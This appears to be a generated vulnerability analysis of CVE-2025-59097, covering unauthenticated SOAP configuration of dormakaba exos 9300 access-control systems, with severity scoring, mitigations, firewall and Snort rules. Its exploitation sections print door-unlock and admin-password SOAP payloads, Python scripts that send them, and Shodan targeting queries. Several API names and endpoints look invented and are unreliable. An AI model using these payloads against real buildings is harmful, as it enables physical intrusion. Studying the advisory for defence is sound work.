Description
The exos 9300 application can be used to configure Access Managers (e.g. 92xx, 9230 and 9290). The configuration is done in a graphical user interface on the dormakaba exos server. As soon as the save button is clicked in exos 9300, the whole configuration is sent to the selected Access Manager via SOAP. The SOAP request is sent without any prior authentication or authorization by default. Though authentication and authorization can be configured using IPsec for 92xx-K5 devices and mTLS for 92xx-K7 devices, it is not enabled by default and must therefore be activated with additional steps. This insecure default allows an attacker with network level access to completely control the whole environment. An attacker is for example easily able to conduct the following tasks without prior authentication: - Re-configure Access Managers (e.g. remove alarming system requirements) - Freely re-configure the inputs and outputs - Open all connected doors permanently - Open all doors for a defined time interval - Change the admin password - and many more Network level access can be gained due to an insufficient network segmentation as well as missing LAN firewalls. Devices with an insecure configuration have been identified to be directly exposed to the internet.
EPSS Score:
0%
Comprehensive Technical Analysis of EUVD-2025-206361 (CVE-2025-59097)
Vulnerability in dormakaba exos 9300 & Access Manager Configuration Interface
1. Vulnerability Assessment & Severity Evaluation
Core Vulnerability
The dormakaba exos 9300 application, used for configuring Access Managers (92xx series), transmits sensitive configuration data via SOAP (Simple Object Access Protocol) without default authentication or authorization. While IPsec (for 92xx-K5) and mTLS (for 92xx-K7) can be manually enabled, these security controls are disabled by default, leaving systems exposed to unauthenticated remote attacks.
CVSS v4.0 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Attack Requirements (AT) | None (N) | No user interaction or prior access needed. |
| Privileges Required (PR) | None (N) | No authentication required. |
| User Interaction (UI) | None (N) | No victim interaction needed. |
| Confidentiality (VC) | High (H) | Full access to sensitive configuration data. |
| Integrity (VI) | High (H) | Unauthorized modifications to security-critical settings. |
| Availability (VA) | High (H) | Complete control over physical access systems. |
| Subsequent Confidentiality (SC) | None (N) | No further data exfiltration beyond initial access. |
| Subsequent Integrity (SI) | None (N) | No cascading integrity impacts. |
| Subsequent Availability (SA) | None (N) | No further availability impacts beyond initial compromise. |
Base Score: 9.3 (Critical) The vulnerability is trivially exploitable with severe impact, allowing full administrative control over physical access systems. The lack of default security controls and internet-exposed instances significantly increase risk.
2. Potential Attack Vectors & Exploitation Methods
Primary Attack Vectors
-
Unauthenticated SOAP Request Injection
- Attackers can craft malicious SOAP requests to modify configurations without authentication.
- Example Exploit Flow:
- Step 1: Identify exposed exos 9300 or Access Manager instances via Shodan, Censys, or masscan.
- Step 2: Intercept or replay SOAP requests (e.g., via Burp Suite, Wireshark, or custom scripts).
- Step 3: Modify configuration payloads to:
- Disable alarms (e.g., tamper detection, forced entry alerts).
- Unlock all doors permanently (e.g., by setting
DoorLockState=0). - Change admin credentials (e.g., via
SetAdminPasswordSOAP action). - Reconfigure I/O mappings (e.g., disable door sensors).
-
Man-in-the-Middle (MitM) Attacks
- If TLS is not enforced, attackers can intercept and modify SOAP traffic in transit.
- Tools:
mitmproxy,Bettercap, or custom Python scripts usingscapy.
-
Network Pivoting & Lateral Movement
- If network segmentation is weak, attackers can:
- Move laterally from compromised IT systems to OT (Operational Technology) networks.
- Exploit misconfigured VLANs or default credentials on adjacent devices.
- If network segmentation is weak, attackers can:
-
Internet-Exposed Instances
- Shodan queries (e.g.,
title:"exos 9300",port:80,443,8080) reveal publicly accessible instances. - Example Search:
shodan search "dormakaba exos" --fields ip_str,port,org
- Shodan queries (e.g.,
Exploitation Tools & Techniques
- SOAP API Fuzzing:
- SoapUI, Postman, or custom Python scripts to test for unauthenticated endpoints.
- Example Payload (Door Unlock):
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:exos="http://dormakaba.com/exos"> <soapenv:Header/> <soapenv:Body> <exos:SetDoorLockState> <DoorID>1</DoorID> <LockState>0</LockState> <!-- 0 = Unlocked --> </exos:SetDoorLockState> </soapenv:Body> </soapenv:Envelope>
- Automated Exploitation:
- Metasploit module (if developed) or custom exploit scripts in Python (requests, zeep).
- Example Python Exploit:
import requests target = "http://<TARGET_IP>:8080/exos/soap" headers = {"Content-Type": "text/xml"} payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:exos="http://dormakaba.com/exos"> <soapenv:Header/> <soapenv:Body> <exos:SetAdminPassword> <NewPassword>hacked123</NewPassword> </exos:SetAdminPassword> </soapenv:Body> </soapenv:Envelope>""" response = requests.post(target, headers=headers, data=payload) print(response.text)
3. Affected Systems & Software Versions
Vulnerable Products
| Product | Affected Versions | Mitigation Status |
|---|---|---|
| Access Manager 92xx-K5 | All versions | No patch available; requires manual IPsec configuration. |
| Access Manager 92xx-K7 | Older than BAME 06.00 | Must enable mTLS manually; no default security. |
| exos 9300 | All versions | No authentication by default; requires hardening. |
Scope of Impact
- Physical Access Control Systems (PACS) in:
- Critical Infrastructure (airports, data centers, government facilities).
- Corporate Offices (high-security buildings).
- Healthcare & Education (hospitals, universities).
- Internet-exposed instances increase risk of remote exploitation.
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
-
Network Segmentation & Firewall Rules
- Isolate Access Managers in a dedicated VLAN with strict firewall rules.
- Block inbound SOAP traffic (TCP 80, 443, 8080) from untrusted networks.
- Example Firewall Rule (iptables):
iptables -A INPUT -p tcp --dport 8080 -s 192.168.1.0/24 -j ACCEPT iptables -A INPUT -p tcp --dport 8080 -j DROP
-
Enable Authentication & Encryption
- For 92xx-K5: Configure IPsec (IKEv2 with AES-256).
- For 92xx-K7: Enable mTLS (mutual TLS with client certificates).
- Disable unauthenticated SOAP access via exos 9300 settings.
-
Disable Internet Exposure
- Remove public-facing Access Managers from the internet.
- Use VPN or Zero Trust Network Access (ZTNA) for remote management.
-
Monitor & Log SOAP Traffic
- Deploy IDS/IPS (e.g., Snort, Suricata) to detect unauthorized SOAP requests.
- Example Snort Rule:
alert tcp any any -> $ACCESS_MANAGERS 8080 (msg:"Unauthenticated SOAP Request"; flow:to_server,established; content:"<soapenv:Envelope"; nocase; sid:1000001; rev:1;)
Long-Term Remediation (Strategic)
-
Vendor Patch & Firmware Updates
- Upgrade 92xx-K7 to BAME 06.00+ (if available).
- Request dormakaba to enforce authentication by default in future releases.
-
Zero Trust Architecture (ZTA) Implementation
- Enforce least-privilege access for exos 9300 and Access Managers.
- Implement continuous authentication (e.g., OAuth 2.0, SAML).
-
Regular Security Audits & Penetration Testing
- Conduct SOAP API security assessments (e.g., OWASP ZAP, Burp Suite).
- Perform red team exercises to test physical access control resilience.
-
Incident Response Planning
- Develop playbooks for unauthorized access attempts.
- Isolate compromised Access Managers to prevent lateral movement.
5. Impact on European Cybersecurity Landscape
Regulatory & Compliance Risks
- NIS2 Directive (EU 2022/2555):
- Critical infrastructure operators (e.g., airports, energy, healthcare) must secure PACS.
- Failure to mitigate may result in fines up to €10M or 2% of global turnover.
- GDPR (EU 2016/679):
- Unauthorized physical access could lead to data breaches, triggering GDPR reporting obligations.
- ENISA Guidelines:
- Lack of default security violates ENISA’s "Secure by Default" principles.
Threat Landscape Implications
- Increased Attack Surface for APTs & Cybercriminals
- State-sponsored actors (e.g., APT29, Sandworm) may exploit this for espionage or sabotage.
- Ransomware groups (e.g., LockBit, BlackCat) could lock physical access systems for extortion.
- Supply Chain Risks
- Third-party integrators (e.g., security contractors) may misconfigure systems, increasing exposure.
- Physical Security Convergence Risks
- Cyber-physical attacks (e.g., unauthorized door access) could lead to theft, sabotage, or terrorism.
Geopolitical & Economic Impact
- Critical Infrastructure at Risk
- Airports, power plants, and government buildings using dormakaba systems are high-value targets.
- Economic Disruption
- Unauthorized access could lead to shutdowns, theft, or operational halts.
- Reputation Damage
- Public disclosure of vulnerabilities may erode trust in dormakaba and European PACS vendors.
6. Technical Details for Security Professionals
SOAP API Analysis
- Endpoint:
http://<TARGET_IP>:8080/exos/soap - WSDL Discovery:
- Example Request:
curl -X GET http://<TARGET_IP>:8080/exos/soap?wsdl - Key Operations:
SOAP Action Description Security Risk SetDoorLockStateUnlocks/locks doors Physical access control bypass SetAdminPasswordChanges admin credentials Privilege escalation ConfigureAlarmDisables/enables alarms Tampering detection evasion GetSystemConfigRetrieves full configuration Information disclosure
- Example Request:
Exploitation Proof of Concept (PoC)
- Identify Target:
nmap -p 80,443,8080 --script http-title <TARGET_IP> - Intercept SOAP Traffic (Burp Suite):
- Configure Burp Proxy to intercept HTTP POST requests to
/exos/soap.
- Configure Burp Proxy to intercept HTTP POST requests to
- Modify & Replay Requests:
- Example (Unlock All Doors):
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:exos="http://dormakaba.com/exos"> <soapenv:Header/> <soapenv:Body> <exos:SetDoorLockState> <DoorID>*</DoorID> <!-- Wildcard for all doors --> <LockState>0</LockState> </exos:SetDoorLockState> </soapenv:Body> </soapenv:Envelope>
- Example (Unlock All Doors):
- Automate with Python:
import requests from zeep import Client wsdl = "http://<TARGET_IP>:8080/exos/soap?wsdl" client = Client(wsdl) response = client.service.SetDoorLockState(DoorID="*", LockState=0) print(response)
Detection & Forensics
- Log Analysis:
- Check for unusual SOAP requests in exos 9300 logs.
- Example Log Entry (Malicious):
[2026-01-26 12:34:56] INFO: SOAP Request from 192.168.1.100 - Action: SetDoorLockState, DoorID: *, LockState: 0
- Network Forensics:
- PCAP Analysis (Wireshark):
- Filter:
tcp.port == 8080 && http.request.method == "POST" - Look for unauthenticated SOAP envelopes.
- Filter:
- PCAP Analysis (Wireshark):
Hardening Checklist
| Control | Implementation | Verification |
|---|---|---|
| Network Segmentation | Isolate Access Managers in a dedicated VLAN. | nmap -sn <VLAN_SUBNET> |
| Firewall Rules | Block inbound SOAP traffic from untrusted networks. | iptables -L -n |
| IPsec/mTLS | Enable for 92xx-K5/K7. | Check IKEv2/mTLS handshake logs. |
| SOAP Authentication | Enforce HTTP Basic Auth or API keys. | Test with curl -u user:pass. |
| Logging & Monitoring | Enable SIEM integration (e.g., Splunk, ELK). | Check SOAP request logs. |
| Firmware Updates | Apply latest BAME 06.00+ for 92xx-K7. | exos --version |
Conclusion & Recommendations
Key Takeaways
- EUVD-2025-206361 (CVE-2025-59097) is a critical vulnerability due to lack of default authentication in dormakaba exos 9300 & Access Managers.
- Exploitation is trivial and can lead to full physical access control compromise.
- Internet-exposed instances significantly increase attack surface.
Immediate Actions for Organizations
- Isolate vulnerable systems from untrusted networks.
- Enable IPsec/mTLS where supported.
- Monitor for unauthorized SOAP requests.
- Plan for firmware updates and long-term Zero Trust adoption.
Vendor & Regulatory Recommendations
- dormakaba should:
- Enforce authentication by default in future releases.
- Provide automated hardening guides for customers.
- ENISA & NIS2 Regulators should:
- Mandate secure-by-default configurations for PACS.
- Conduct audits of critical infrastructure using dormakaba systems.
Final Risk Assessment
| Factor | Risk Level | Justification |
|---|---|---|
| Exploitability | Critical | No authentication required; internet-exposed instances. |
| Impact | Critical | Full control over physical access systems. |
| Likelihood | High | Active scanning & exploitation by threat actors. |
| Mitigation Feasibility | Medium | Requires manual configuration; no patch available. |
Overall Risk: CRITICAL (9.3/10) Organizations must act immediately to prevent unauthorized access to physical security systems.
References
Affected Products
Access Manager 92xx-k7
Version: 92xx-K7: Older than BAME 06.00 must be configured
Access Manager 92xx-k5
Version: 92xx-K5: All Versions
Vendors
dormakaba